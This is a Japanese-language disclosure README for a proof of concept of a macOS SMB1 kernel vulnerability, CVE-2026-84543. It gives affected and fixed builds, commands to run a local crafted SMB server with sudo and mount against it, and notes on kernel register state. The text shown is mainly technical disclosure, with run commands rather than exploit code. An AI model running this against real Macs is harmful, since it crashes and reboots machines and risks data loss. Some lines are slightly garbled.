
CVE-2026-84543の概念実証および技術的開示。細工されたSMB1応答によってカーネルパニックを引き起こすmacOS SMBカーネル脆弱性。
この概念実証は、影響を受ける Mac のカーネルパニックと再起動を引き起こすことが想定されています。
研究中に使用された影響を受けるテストビルドは、macOS Tahoe 26.4 (25E246) および macOS 26.5 beta 4 (25F5068a) でした。Apple は CVE-2026-84543 を macOS Golden Gate 27、Tahoe 26.7、および Sequoia 15.8 で修正しました。
smb1_unix_whoami_poc.py はループバック証拠キャプチャサーバーです。Python の標準ライブラリのみを使用し、以下を行います:
_COMM_PAGE_ASB_TARGET_KERN_VALUE を読み取る;SMB_QFS_POSIX_WHOAMI (0x0202) レスポンスを返す;そして0x020B) 属性を返す。ターミナル A で:
cd poc
sudo python3 smb1_unix_whoami_poc.py \
--bind 127.0.0.1 \
--port 445 \
--log /tmp/CVE-2026-84543-poc.log
出力された ASB_TARGET_KERN_VALUE を記録してください;これはブート時にランダム化されます。
ターミナル B で:
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543
T をブート時に出力されたカーネル値カナリアとすると:
x8 = T
x9 = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1
x8、x9、および x11 の特定のビットが来歴を確立します。観測された関係は、サーバーのレスポンスフィールドとライブカーネルレジスタ状態との間のバイト単位のリンクを提供します。